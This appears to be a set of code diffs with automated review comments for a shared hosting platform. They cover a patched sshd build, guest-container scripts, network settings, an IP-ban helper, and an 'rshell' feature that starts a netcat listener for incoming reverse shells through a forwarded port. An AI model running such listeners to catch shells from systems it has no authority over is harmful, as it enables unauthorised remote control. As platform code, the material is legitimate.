${CN}To force-exit this shell, type ${CDY}kill \"\$(pgrep -P $$)\"${CN} ${CN}${CF}-------------------------------------------------------------------------------${CN}
-----------------------------------" To force-exit this listener, type ${CDY}kill \"\$(pgrep -P $$)\"${CN} on your Root Server"
# PS1='USERS=$(who | wc -l) LOAD=$(cut -f1 -d" " /proc/loadavg) PS=$(ps -e --no-headers|wc -l) \[\e[36m\]\u\[\e[m\]@\[\e[32m\]\h:\[\e[33;1m\]\w \[\e[0;31m\]\$\[\e[m\] ' # PS1='USERS=$(who | wc -l) LOAD=$(cut -f1 -d" " /proc/loadavg) PS=$(ps -e --no-headers|wc -l) \[\e[36m\]\u\[\e[m\]@\[\e[32m\]\h:\[\e[33;1m\]\w \[\e[0;31m\]\$\[\e[m\] '
cfg=$(stty --save) cfg=$(stty --save)
stty raw -echo opost stty raw -echo opost
time nc -vnlp "$rport" echo -e "${CDG}Listening on ${CG}${rip}:${rport}${CN}"
echo "Restoring TTY" nc -nlp "$rport"
echo "🦋 Restoring terminal..."
stty "$cfg" stty "$cfg"
# reset -I # reset -I
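Review bot: Replacing `time nc -vnlp "$rport"` with `nc -nlp "$rport"` drops `-v`, so the listener no longer reports the address of the peer that connected, which is the one piece of information the operator needs to confirm the connection came from the expected host rather than from something else that reached the open port; keep `nc -vnlp "$rport"`, the new `Listening on` line works fine alongside it. The added `[[ ! -f /config/self/reverse_port ]] && curl sf/port` line lets curl's own output and errors reach the terminal before `load rport` does its check; if that output is not wanted here, `curl -s sf/port >/dev/null` keeps the screen to the messages this script prints, since `load rport` already reports failure. The script continues outside the hunk on both sides.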

@ -1,29 +1,34 @@
VER=9.6p1
all: albuild fs-root/bin/docker-exec-sigproxy fs-root/bin/unix-socket-client fs-root/usr/sbin/sshd Dockerfile all: albuild fs-root/bin/docker-exec-sigproxy fs-root/bin/unix-socket-client fs-root/usr/sbin/sshd Dockerfile
docker build --no-cache --network host -t sf-host . docker build --no-cache --network host -t sf-host .
albuild: albuild:
bash -c "docker run --rm alpine-gcc true || \ bash -c "docker run --rm sf-alpine-gcc true || \
docker commit alpine-gcc alpine-gcc || { \ docker commit sf-alpine-gcc sf-alpine-gcc || { \
docker run --network host --name alpine-gcc alpine sh -c 'apk update && apk add gcc patch libc-dev musl-dev zlib-dev openssl-dev make linux-headers libcap-dev bash' \ docker run --network host --name sf-alpine-gcc alpine sh -c 'apk update && apk add gcc patch libc-dev musl-dev zlib-dev openssl-dev make linux-headers libcap-dev bash' \
&& docker commit alpine-gcc alpine-gcc; }" && docker commit sf-alpine-gcc sf-alpine-gcc; }"
# See mk_sshd.sh for manual debugging # See mk_sshd.sh for manual debugging
fs-root/usr/sbin/sshd: sf-sshd.patch mk_sshd.sh fs-root/usr/sbin/sshd: albuild sf-sshd.patch mk_sshd.sh
docker run --rm -v$$(pwd):/src --net=host -w /tmp alpine-gcc /src/mk_sshd.sh docker run --rm -v$$(pwd):/src --net=host -w /tmp --env VER=$(VER) sf-alpine-gcc /src/mk_sshd.sh
@echo "Type 'make diff' to create a sf-sshd-$(VER).patch"
fs-root/bin/docker-exec-sigproxy: docker-exec-sigproxy.c fs-root/bin/docker-exec-sigproxy: docker-exec-sigproxy.c
docker run --rm -v$$(pwd):/src -w /src alpine-gcc gcc -Wall -O2 -o fs-root/bin/docker-exec-sigproxy docker-exec-sigproxy.c docker run --rm -v$$(pwd):/src -w /src sf-alpine-gcc gcc -Wall -O2 -o fs-root/bin/docker-exec-sigproxy docker-exec-sigproxy.c
@echo SUCCESS @echo SUCCESS
fs-root/bin/unix-socket-client: unix-socket-client.c fs-root/bin/unix-socket-client: unix-socket-client.c
docker run --rm -v$$(pwd):/src -w /src alpine-gcc gcc -Wall -O2 -o fs-root/bin/unix-socket-client unix-socket-client.c docker run --rm -v$$(pwd):/src -w /src sf-alpine-gcc gcc -Wall -O2 -o fs-root/bin/unix-socket-client unix-socket-client.c
@echo SUCCESS @echo SUCCESS
diff: diff:
cd dev && \ cd dev && \
diff -x '!*.[ch]' -u openssh-9.2p1-orig/ openssh-9.2p1-sf/ | grep -Ev ^"(Only in|Common)" >../sf-sshd.patch diff -x '!*.[ch]' -u openssh-$(VER)-orig/ openssh-$(VER)-sf/ | grep -Ev ^"(Only in|Common)" >../sf-sshd-$(VER).patch
@echo "May want to 'mv sf-sshd-$(VER).patch sf-sshd.patch'."
clean: clean:
rm -rf openssh-9.2p1-sf fs-root/usr/sbin/sshd rm -rf openssh-$(VER)-orig openssh-$(VER)-sf fs-root/usr/sbin/sshd
docker image rm alpine-gcc docker image rm sf-alpine-gcc
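Review bot: `fs-root/usr/sbin/sshd: albuild sf-sshd.patch mk_sshd.sh` adds `albuild`, which produces no file, as a normal prerequisite, so make treats it as remade on every run and recompiles sshd (a full OpenSSH build inside docker) each time `make` is invoked even when nothing changed; an order-only prerequisite keeps the intent that the image must exist first without the spurious rebuild: `fs-root/usr/sbin/sshd: sf-sshd.patch mk_sshd.sh | albuild`. None of `all`, `albuild`, `diff` or `clean` are declared phony, so add `.PHONY: all albuild diff clean`. Since `VER` now drives `--env VER=$(VER)` as well as the `diff` and `clean` paths, a `make VER=... diff` must use the same value sshd was built with; a short comment on the `VER=9.6p1` line saying so would help. The file appears to be complete within the hunk.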

@ -424,7 +424,7 @@ print_goodbye()
# Restricted shell (-r) wont let us redirect stderr - use a bash-exec trick # Restricted shell (-r) wont let us redirect stderr - use a bash-exec trick
# Note: pgrep is executed in user's context. Treat the output with care and do not trust it. # Note: pgrep is executed in user's context. Treat the output with care and do not trust it.
n=$(bash -c "exec docker exec --user 0:0 \"lg-${LID}\" pgrep -c . 2>/dev/null" | head -n1) n=$(timeout 2 bash -c "exec docker exec --user 0:0 \"lg-${LID}\" pgrep -c . 2>/dev/null" | head -n1)
[[ -z "$n" ]] && n=0 [[ -z "$n" ]] && n=0
[[ ${#n} -gt 5 ]] && n=0 [[ ${#n} -gt 5 ]] && n=0
[[ ! $n -eq $n ]] && n=0 [[ ! $n -eq $n ]] && n=0
@ -435,7 +435,7 @@ print_goodbye()
str="process is" str="process is"
[[ "$n" -gt 1 ]] && str="processes are" [[ "$n" -gt 1 ]] && str="processes are"
echo -e "${CY}WARNING: ${CR}${n}${CY} ${str} still running:${CN}" echo -e "${CY}WARNING: ${CR}${n}${CY} ${str} still running:${CN}"
exec_errnull docker exec --user 0:0 "lg-${LID}" pgrep . -al | tail -n+3 | while read -r x; do p="${x%% *} "; n="${x#* }"; echo -e "${CDY}--> ${CDR}${p:0:8}${CDG}${n:0:68}${CN}"; done exec_errnull timeout 2 docker exec --user 0:0 "lg-${LID}" pgrep . -al | tail -n+3 | while read -r x; do p="${x%% *} "; n="${x#* }"; echo -e "${CDY}--> ${CDR}${p:0:8}${CDG}${n:0:68}${CN}"; done
echo -e "\ echo -e "\
-------> The encrypted filesystem in /sec will remain accessible until -------> The encrypted filesystem in /sec will remain accessible until
-------> the last shell exits or all background processes terminate. -------> the last shell exits or all background processes terminate.
@ -443,16 +443,6 @@ print_goodbye()
-------> This will also make /sec unavailabe until your next log in." -------> This will also make /sec unavailabe until your next log in."
fi fi
echo -en "\r" echo -en "\r"
[[ -z $SF_IS_PAYING ]] && {
echo -e "\
${CDY}@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@ ${CDG}** GET MORE MEMORY, SPEED, STORAGE AND NO RESTRICTIONS **${CDY} @@@
@@@ ${CDR}${CUL}https://www.thc.org/segfault/free${CN}${CDY} @@@
@@@ ${CB}${CUL}https://www.thc.org/segfault/upgrade${CN}${CDY} @@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@${CN}"
}
sysmsg "/config/host/etc/logoutmsg-all.sh" sysmsg "/config/host/etc/logoutmsg-all.sh"
echo -e "\ echo -e "\
@ -536,7 +526,7 @@ spawn_shell_exit()
tofile "${YOUR_IP:?}" "${SF_RUN_DIR}/ips/lg-${LID}.ip" tofile "${YOUR_IP:?}" "${SF_RUN_DIR}/ips/lg-${LID}.ip"
[[ -n $YOUR_GEOIP ]] && tofile "${YOUR_GEOIP}" "/config/self-for-guest/lg-${LID}/geoip" [[ -n $YOUR_GEOIP ]] && tofile "${YOUR_GEOIP}" "/config/self-for-guest/lg-${LID}/geoip"
# Request a reverse Port Forward # Request a reverse Port Forward
[[ -n $SF_RPORT_ON_LOGIN ]] && [[ -n $SF_RPORT ]] && [[ ! -f "/config/self-for-guest/lg-${LID}/reverse_ip" ]] && exec_devnull docker exec --user 0:0 "lg-${LID}" curl -s sf/port [[ -n $SF_RPORT_ON_LOGIN ]] && [[ -n $SF_RPORT ]] && [[ ! -f "/config/self-for-guest/lg-${LID}/reverse_ip" ]] && exec_devnull timeout 2 docker exec --user 0:0 "lg-${LID}" curl -s sf/port
# Warn user if this is the last server by IP (after semaphore has been released) # Warn user if this is the last server by IP (after semaphore has been released)
@ -1400,7 +1390,7 @@ exec_devnull docker exec sf-master /ready-lg.sh "${LID}" "${C_IP}" "${LG_PID}" "
# Setup container (within container's namespace) # Setup container (within container's namespace)
unset WGNAME_UP unset WGNAME_UP
[[ -s "${SF_USER_DB_DIR}/wg/name_up" ]] && WGNAME_UP="$(<"${SF_USER_DB_DIR}/wg/name_up")" [[ -s "${SF_USER_DB_DIR}/wg/name_up" ]] && WGNAME_UP="$(<"${SF_USER_DB_DIR}/wg/name_up")"
exec_devnull docker exec --user 0:0 --env SF_IS_NEW_SERVER="${SF_IS_NEW_SERVER}" --env WGNAME_UP="${WGNAME_UP}" "lg-${LID}" /sf/bin/sf-setup.sh || STOPEXIT "${LID}" 247 "Failed-#2 to set up guest container..." exec_devnull timeout 5 docker exec --user 0:0 --env SF_IS_NEW_SERVER="${SF_IS_NEW_SERVER}" --env WGNAME_UP="${WGNAME_UP}" "lg-${LID}" /sf/bin/sf-setup.sh || STOPEXIT "${LID}" 247 "Failed-#2 to set up guest container..."
touch "/config/self-for-guest/lg-${LID}/THIS-DIRECTORY-IS-IN-MEMORY-ONLY" touch "/config/self-for-guest/lg-${LID}/THIS-DIRECTORY-IS-IN-MEMORY-ONLY"
tofile "${C_IP:?}" "/config/self-for-guest/lg-${LID}/c_ip" tofile "${C_IP:?}" "/config/self-for-guest/lg-${LID}/c_ip"

@ -11,11 +11,17 @@
DSTDIR="/src/fs-root/usr/sbin" DSTDIR="/src/fs-root/usr/sbin"
DSTBIN="${DSTDIR}/sshd" DSTBIN="${DSTDIR}/sshd"
set -e set -e
SRCDIR="/tmp/openssh-9.2p1" SRCDIR="/src/dev/openssh-${VER:?}-sf"
[[ ! -d "/src/dev" ]] && mkdir -p "/src/dev"
cd /src/dev
[[ ! -d "$SRCDIR" ]] && { [[ ! -d "$SRCDIR" ]] && {
# Cloudflare to often returns 503 - "BLOCKED" # Cloudflare to often returns 503 - "BLOCKED"
# wget -O- https://cloudflare.cdn.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-9.2p1.tar.gz | tar xfz - # wget -O- https://cloudflare.cdn.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-9.2p1.tar.gz | tar xfz -
wget -O- https://artfiles.org/openbsd/OpenSSH/portable/openssh-9.2p1.tar.gz | tar xfz - wget "https://artfiles.org/openbsd/OpenSSH/portable/openssh-${VER}.tar.gz"
tar xfz "openssh-${VER}.tar.gz"
mv "openssh-${VER}" "openssh-${VER}-orig"
tar xfz "openssh-${VER}.tar.gz"
mv "openssh-${VER}" "${SRCDIR}"
cd "$SRCDIR" cd "$SRCDIR"
@ -39,5 +45,5 @@ strip sshd
[[ ! -d "${DSTDIR}" ]] && mkdir -p "${DSTDIR}" [[ ! -d "${DSTDIR}" ]] && mkdir -p "${DSTDIR}"
cp sshd "${DSTBIN}" cp sshd "${DSTBIN}"
chmod 755 "${DSTBIN}" chmod 755 "${DSTBIN}"
rm -rf "${SRCDIR:?}" # rm -rf "${SRCDIR:?}"
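Review bot: The tarball fetched by the new `wget` line is unpacked and built into the `sshd` that is copied into `fs-root` without any integrity check, so the binary shipped to every guest depends entirely on the mirror (artfiles.org) serving an unmodified archive. OpenSSH publishes signed releases; verifying the detached `.asc` signature against the release key, or at least comparing a pinned digest before `tar xfz`, would close that gap: `echo "${OPENSSH_SHA256:?}  openssh-${VER}.tar.gz" | sha256sum -c -` (digest taken from the official release announcement, not from the mirror). Separately, `wget` without `-O` writes `openssh-${VER}.tar.gz.1` when the file already exists from an earlier partial run, and the following `tar xfz "openssh-${VER}.tar.gz"` then silently extracts the stale copy; `wget -O "openssh-${VER}.tar.gz" "https://…/openssh-${VER}.tar.gz"` avoids that. The commented-out `rm -rf "${SRCDIR:?}"` on the last line looks intentional for regenerating the patch against `-orig`, but a one-line comment saying so would stop it being read as dead code.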

@ -1,7 +1,7 @@
diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/channels.c openssh-9.2p1-sf/channels.c diff -x !*.[ch] -u openssh-9.6p1-orig/channels.c openssh-9.6p1-sf/channels.c
--- openssh-9.2p1-orig/channels.c 2023-02-02 12:21:54 --- openssh-9.6p1-orig/channels.c 2023-12-18 14:59:50
+++ openssh-9.2p1-sf/channels.c 2023-08-15 06:13:05 +++ openssh-9.6p1-sf/channels.c 2024-01-20 17:50:15
@@ -3639,7 +3639,7 @@ @@ -3683,7 +3683,7 @@
ssh->chanctxt->IPv4or6 = af; ssh->chanctxt->IPv4or6 = af;
} }
@ -10,7 +10,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/channels.c openssh-9.2p1-s
/* /*
* Determine whether or not a port forward listens to loopback, the * Determine whether or not a port forward listens to loopback, the
* specified address or wildcard. On the client, a specified bind * specified address or wildcard. On the client, a specified bind
@@ -3677,6 +3677,7 @@ @@ -3721,6 +3721,7 @@
* address and it was overridden. * address and it was overridden.
*/ */
if (*listen_addr != '\0' && if (*listen_addr != '\0' &&
@ -18,10 +18,10 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/channels.c openssh-9.2p1-s
strcmp(listen_addr, "0.0.0.0") != 0 && strcmp(listen_addr, "0.0.0.0") != 0 &&
strcmp(listen_addr, "*") != 0) { strcmp(listen_addr, "*") != 0) {
ssh_packet_send_debug(ssh, ssh_packet_send_debug(ssh,
diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1-sf/serverloop.c diff -x !*.[ch] -u openssh-9.6p1-orig/serverloop.c openssh-9.6p1-sf/serverloop.c
--- openssh-9.2p1-orig/serverloop.c 2023-02-02 12:21:54 --- openssh-9.6p1-orig/serverloop.c 2023-12-18 14:59:50
+++ openssh-9.2p1-sf/serverloop.c 2023-08-15 06:18:17 +++ openssh-9.6p1-sf/serverloop.c 2024-01-20 17:50:15
@@ -102,6 +102,12 @@ @@ -101,6 +101,12 @@
/* requested tunnel forwarding interface(s), shared with session.c */ /* requested tunnel forwarding interface(s), shared with session.c */
char *tun_fwd_ifnames = NULL; char *tun_fwd_ifnames = NULL;
@ -34,7 +34,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1
/* returns 1 if bind to specified port by specified user is permitted */ /* returns 1 if bind to specified port by specified user is permitted */
static int static int
bind_permitted(int port, uid_t uid) bind_permitted(int port, uid_t uid)
@@ -391,8 +397,10 @@ @@ -388,8 +394,10 @@
/* Clean up sessions, utmp, etc. */ /* Clean up sessions, utmp, etc. */
cleanup_exit(255); cleanup_exit(255);
} }
@ -46,7 +46,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1
if (conn_in_ready && if (conn_in_ready &&
process_input(ssh, connection_in) < 0) process_input(ssh, connection_in) < 0)
break; break;
@@ -637,12 +645,14 @@ @@ -634,12 +642,14 @@
if (strcmp(ctype, "session") == 0) { if (strcmp(ctype, "session") == 0) {
c = server_request_session(ssh); c = server_request_session(ssh);
@ -67,7 +67,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1
} }
if (c != NULL) { if (c != NULL) {
debug_f("confirm %s", ctype); debug_f("confirm %s", ctype);
@@ -802,8 +812,20 @@ @@ -799,8 +809,20 @@
ssh_packet_send_debug(ssh, "Server has disabled port forwarding."); ssh_packet_send_debug(ssh, "Server has disabled port forwarding.");
} else { } else {
/* Start listening on the port */ /* Start listening on the port */
@ -90,10 +90,10 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1
} }
if ((resp = sshbuf_new()) == NULL) if ((resp = sshbuf_new()) == NULL)
fatal_f("sshbuf_new"); fatal_f("sshbuf_new");
diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/sshd.c openssh-9.2p1-sf/sshd.c diff -x !*.[ch] -u openssh-9.6p1-orig/sshd.c openssh-9.6p1-sf/sshd.c
--- openssh-9.2p1-orig/sshd.c 2023-02-02 12:21:54 --- openssh-9.6p1-orig/sshd.c 2023-12-18 14:59:50
+++ openssh-9.2p1-sf/sshd.c 2023-08-15 06:13:05 +++ openssh-9.6p1-sf/sshd.c 2024-01-20 17:50:15
@@ -536,8 +536,71 @@ @@ -531,8 +531,71 @@
return 0; return 0;
} }
} }
@ -165,7 +165,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/sshd.c openssh-9.2p1-sf/ss
privsep_postauth(struct ssh *ssh, Authctxt *authctxt) privsep_postauth(struct ssh *ssh, Authctxt *authctxt)
{ {
#ifdef DISABLE_FD_PASSING #ifdef DISABLE_FD_PASSING
@@ -576,8 +639,34 @@ @@ -571,8 +634,34 @@
reseed_prngs(); reseed_prngs();

@ -47,6 +47,23 @@ Sanitize()
[[ "${#REQUEST_URI}" -gt 512 ]] && BAIL "To long!" "ATTACK" ": REQUEST_URI(${#REQUEST_URI})=${REQUEST_URI:0:32}..." [[ "${#REQUEST_URI}" -gt 512 ]] && BAIL "To long!" "ATTACK" ": REQUEST_URI(${#REQUEST_URI})=${REQUEST_URI:0:32}..."
} }
InitColors() {
# COLOR is set (to 'always')
Y=$CDY
C=$CDC
R=$CDR
RR=$CR
G=$CDG
B=$CB
M=$CDM
YY=$CY
W=$CW
N=$CN
F=$CF
ICON_ERROR="💥 "
ICON_WARN="💥 "
}
GetFormVars() GetFormVars()
{ {
local IFS local IFS
@ -71,7 +88,6 @@ GetFormVars()
[[ ${key} == "config" ]] && { [[ ${key} == "config" ]] && {
R_CONFIG="${val//[^[:alnum:]-_+\/.]}" R_CONFIG="${val//[^[:alnum:]-_+\/.]}"
[[ ${R_CONFIG:0:1} == "-" ]] && unset R_CONFIG [[ ${R_CONFIG:0:1} == "-" ]] && unset R_CONFIG
[[ "${R_CONFIG:0:1}" != "/" ]] && BAIL "Path not absolute. Try ${C}curl ... -d config=\"\$(pwd)/${R_CONFIG}\"${N}"
} }
[[ ${key} == "pass"* ]] && R_PASS="${val//[^[:print:]]}" [[ ${key} == "pass"* ]] && R_PASS="${val//[^[:print:]]}"
[[ ${key} == "user"* ]] && R_USER="${val//[^[:print:]]}" [[ ${key} == "user"* ]] && R_USER="${val//[^[:print:]]}"
@ -128,6 +144,9 @@ GetFormVars()
[[ ! "${WG_DEV}" =~ ^wg ]] && WG_DEV="wg${WG_DEV}" [[ ! "${WG_DEV}" =~ ^wg ]] && WG_DEV="wg${WG_DEV}"
} }
done done
[[ -n $COLOR ]] && InitColors
[[ -n "$R_CONFIG" ]] && [[ "${R_CONFIG:0:1}" != "/" ]] && BAIL "Path not absolute. Try ${C}curl ... -d config=\"\$(pwd)/${R_CONFIG}\"${N}"
} }
# Load PID of WireGuard container # Load PID of WireGuard container
@ -685,9 +704,10 @@ BLPOP portd:response-${LID} 5" | redr) || return
# The PortD add's a /sf/run/self/reverse_forward. # The PortD add's a /sf/run/self/reverse_forward.
echo -en "\ echo -en "\
${M}🌎 Tip${N}: Type ${C}cat /config/self/reverse_*${N} ${M}🌎 Tip${N}: Type ${C}cat /config/self/reverse_*${N} for details.
${M}🤭 Tip${N}: Type ${C}rshell${N} ${M}🤭 Tip${N}: Type ${C}rshell${N} to start listening.
${G}👾 New reverse Port is ${Y}${ipport}${CN}" ${M}🛜 Tip${N}: Type ${C}curl sf/port${N} to assign a new port.
${G}👾 Your reverse Port is ${Y}${ipport}${CN}"
# portd.sh automaticaly adds this to /config/self/reverse_* # portd.sh automaticaly adds this to /config/self/reverse_*
exit exit
@ -807,22 +827,7 @@ cmd_wg_show()
0<&- # Close STDIN 0<&- # Close STDIN
Sanitize Sanitize
GetFormVars GetFormVars
[[ -n $COLOR ]] && {
# COLOR is set (to 'always')
Y=$CDY
C=$CDC
R=$CDR
RR=$CR
G=$CDG
B=$CB
M=$CDM
YY=$CY
W=$CW
N=$CN
F=$CF
ICON_ERROR="💥 "
ICON_WARN="💥 "
}
[[ "${FCGI_CMD}" == "dmesg" ]] && { [[ "${FCGI_CMD}" == "dmesg" ]] && {
@ -836,13 +841,13 @@ GetFormVars
# If it is >=2025 then you can remove this block (it's now served via curl sf/vpn/*) # If it is >=2025 then you can remove this block (it's now served via curl sf/vpn/*)
[[ -n $SF_OVPN_HACK ]] && { [[ -n $SF_OVPN_HACK ]] && {
wg_net_init wg_net_init
[[ ${ARGS[1]} == 'vpn' ]] && { [[ ${ARGS[1]} == 'ovpn' ]] && {
source "/sf/bin/funcs_vpn.sh" source "/sf/bin/funcs_ovpn.sh"
[[ ${ARGS[2]} == 'up' ]] && cmd_vpn_up [[ ${ARGS[2]} == 'up' ]] && cmd_ovpn_up
[[ ${ARGS[2]} == 'show' ]] && cmd_vpn_show [[ ${ARGS[2]} == 'show' ]] && cmd_ovpn_show
[[ ${ARGS[2]} == 'del' ]] && cmd_vpn_del [[ ${ARGS[2]} == 'del' ]] && cmd_ovpn_del
[[ ${ARGS[2]} == 'down' ]] && cmd_vpn_del [[ ${ARGS[2]} == 'down' ]] && cmd_ovpn_del
cmd_vpn_help cmd_ovpn_help
exit exit
} }
} }
@ -869,14 +874,14 @@ wg_net_init
exit exit
} }
[[ "${FCGI_CMD}" == "vpn" ]] && { [[ "${FCGI_CMD}" == "ovpn" ]] && {
source "/sf/bin/funcs_vpn.sh" source "/sf/bin/funcs_ovpn.sh"
[[ ${ARGS[1]} == 'up' ]] && cmd_vpn_up [[ ${ARGS[1]} == 'up' ]] && cmd_ovpn_up
[[ ${ARGS[1]} == 'show' ]] && cmd_vpn_show [[ ${ARGS[1]} == 'show' ]] && cmd_ovpn_show
[[ ${ARGS[1]} == 'del' ]] && cmd_vpn_del [[ ${ARGS[1]} == 'del' ]] && cmd_ovpn_del
[[ ${ARGS[1]} == 'down' ]] && cmd_vpn_del [[ ${ARGS[1]} == 'down' ]] && cmd_ovpn_del
# [[ ${ARGS[1]} == 'show' ]] && cmd_wg_show # [[ ${ARGS[1]} == 'show' ]] && cmd_wg_show
cmd_vpn_help cmd_ovpn_help
exit exit
} }
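Review bot: The dispatch is renamed from `vpn` to `ovpn` in both the `SF_OVPN_HACK` block and the `FCGI_CMD` block, but the usage text printed by `cmd_ovpn_help` in funcs_ovpn.sh (the `Use ${C}curl sf/vpn/up -d config=…` lines in that file's first hunk) still names the old `sf/vpn/up` path, so a user following the help will hit whatever `sf/vpn` now routes to; unless `sf/vpn` is deliberately kept as an alias, those two lines should read `curl sf/ovpn/up …`. Moving the `InitColors` call and the absolute-path check to the end of `GetFormVars` is a sound fix for the uncoloured BAIL, but note `Sanitize` still runs before any colours are set, so its own BAIL output is unchanged; a short comment on the `[[ -n $COLOR ]] && InitColors` line (`# colours must be initialised before any BAIL below uses ${C}/${N}`) would record why the call lives here rather than in main.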

@ -19,7 +19,9 @@ USER_UL_RATE="$5"
LID_PROMPT_FN="/dev/shm/sf/self-for-guest/lg-${LID}/prompt" LID_PROMPT_FN="/dev/shm/sf/self-for-guest/lg-${LID}/prompt"
# Create 'empty' for ZSH's prompt to show WG EXIT # Create 'empty' for ZSH's prompt to show WG EXIT
[[ ! -f "${LID_PROMPT_FN}" ]] && touch "${LID_PROMPT_FN}" # [[ ! -f "${LID_PROMPT_FN}" ]] && touch "${LID_PROMPT_FN}"
# Overwrite existing. Will be re-created by sf-setup.sh if WG-NET is up still.
:>"${LID_PROMPT_FN}"
set -e set -e
LG_MAC=$(docker inspect -f '{{ (index .NetworkSettings.Networks "sf-guest").MacAddress }}' "lg-${LID:?}") LG_MAC=$(docker inspect -f '{{ (index .NetworkSettings.Networks "sf-guest").MacAddress }}' "lg-${LID:?}")
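Review bot: The old `touch` line is left in as a comment directly above its replacement `:>"${LID_PROMPT_FN}"`; since the new redirection supersedes it and the comment on the next line already explains the intent, the commented-out line should be deleted rather than kept as dead code. Note that the truncation runs before `set -e`, so if `/dev/shm/sf/self-for-guest/lg-${LID}` does not exist the failed redirection is reported but ignored and the script continues, the same behaviour the previous `touch` had; if that directory is expected to exist at this point it may be worth saying so in the comment, e.g. `# Truncate (dir is created by the host before this script runs); sf-setup.sh re-populates it if WG-NET is still up.`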

@ -37,7 +37,7 @@ SF_MULLVAD_IP=172.20.0.252
SF_MULLVAD_ROUTE=10.124.0.0/22 SF_MULLVAD_ROUTE=10.124.0.0/22
SF_NOVPN_IP=172.20.0.240 SF_NOVPN_IP=172.20.0.240
SF_NGINX_IP=172.20.1.80 SF_NGINX_IP=172.20.1.80
SF_RPC_IP=10.11.0.2 SF_RPC_IP=100.126.224.2
SF_GSNC_IP=172.22.0.21 SF_GSNC_IP=172.22.0.21
SF_SSHD_IP=172.22.0.22 SF_SSHD_IP=172.22.0.22
SF_DOH_IP=172.23.0.2 SF_DOH_IP=172.23.0.2
@ -49,9 +49,9 @@ SF_NET_ONION=10.111.0.0/16
SF_NET_VPN=172.20.0.0/24 SF_NET_VPN=172.20.0.0/24
SF_NET_VPN_DNS_IP=172.20.0.53 SF_NET_VPN_DNS_IP=172.20.0.53
SF_NET_LG=10.11.0.0/24 SF_NET_LG=100.126.224.0/22
SF_NET_LG_ROUTER_IP=10.11.0.1 SF_NET_LG_ROUTER_IP=100.126.224.1
SF_NET_LG_ROUTER_IP_DUMMY=10.11.0.254 SF_NET_LG_ROUTER_IP_DUMMY=100.126.227.254
SF_NET_VPN_ROUTER_IP=172.20.0.2 SF_NET_VPN_ROUTER_IP=172.20.0.2
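Review bot: The guest network moves from 10.11.0.0/24 to 100.126.224.0/22, which lies inside 100.64.0.0/10, the RFC 6598 shared address space that some overlay and carrier-grade NAT setups also allocate from (Tailscale is a common example); on a host that runs such a service the two routes would overlap. Nothing on the page records why this prefix was chosen, so a one-line comment next to `SF_NET_LG` would help the next operator: `# Guest LG net: 100.64.0.0/10 (RFC 6598 shared space) — must not collide with any CGNAT/overlay range on the host`. The new `SF_RPC_IP`, `SF_NET_LG_ROUTER_IP` and `SF_NET_LG_ROUTER_IP_DUMMY` values all fall within the /22, so the block is internally consistent; any other file that still hard-codes 10.11.0.0/24 is not visible here and would need checking.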

@ -5,7 +5,7 @@ CY="\e[1;33m" # yellow
CG="\e[1;32m" # green CG="\e[1;32m" # green
CR="\e[1;31m" # red CR="\e[1;31m" # red
CC="\e[1;36m" # cyan CC="\e[1;36m" # cyan
# CM="\e[1;35m" # magenta CM="\e[1;35m" # magenta
CW="\e[1;37m" # white CW="\e[1;37m" # white
CB="\e[1;34m" # blue CB="\e[1;34m" # blue
CF="\e[2m" # faint CF="\e[2m" # faint

@ -14,6 +14,7 @@ _self_for_guest_dir="${_sf_shmdir}/self-for-guest"
_sf_basedir="/sf" _sf_basedir="/sf"
_sf_dbdir="${_sf_basedir}/config/db" _sf_dbdir="${_sf_basedir}/config/db"
unset _sf_isinit unset _sf_isinit
_sf_region="$(hostname)"
_sf_deinit() _sf_deinit()
{ {
@ -507,27 +508,29 @@ lgrm()
lgban() lgban()
{ {
local fn local fn
local hn
local ip local ip
local msg local msg
local lid local lglid="${1}"
_sf_init _sf_init
lid="${1}"
shift 1 shift 1
fn="${_self_for_guest_dir}/${lid}/ip" fn="${_self_for_guest_dir}/${lglid}/ip"
[[ -f "$fn" ]] && { [[ -f "$fn" ]] && {
ip=$(<"$fn") ip=$(<"$fn")
fn="${_self_for_guest_dir}/${lglid}/hostname"
[[ -f "${fn}" ]] && hn=$(<"${fn}")
fn="${_sf_dbdir}/banned/ip-${ip:0:18}" fn="${_sf_dbdir}/banned/ip-${ip:0:18}"
[[ ! -e "$fn" ]] && { [[ ! -e "$fn" ]] && {
[[ $# -gt 0 ]] && msg="$*\n" [[ $# -gt 0 ]] && msg="$*\n"
echo -en "$msg" >"${fn}" echo -en "# ${CY}${hn:-NAME} ${CDY}${_sf_region:-REGION} ${lglid} ${ip:0:18}${CN}\n$msg" >"${fn}"
} }
echo "Banned: $ip" echo "Banned: $ip"
} }
lgstop "${lid}" "$@" lgstop "${lglid}" "$@"
#_sf_lgrm "${lid}" # Dont lgrm here and give user chance to explain to re-instate his server. #_sf_lgrm "${lglid}" # Dont lgrm here and give user chance to explain to re-instate his server.
_sf_deinit _sf_deinit
} }
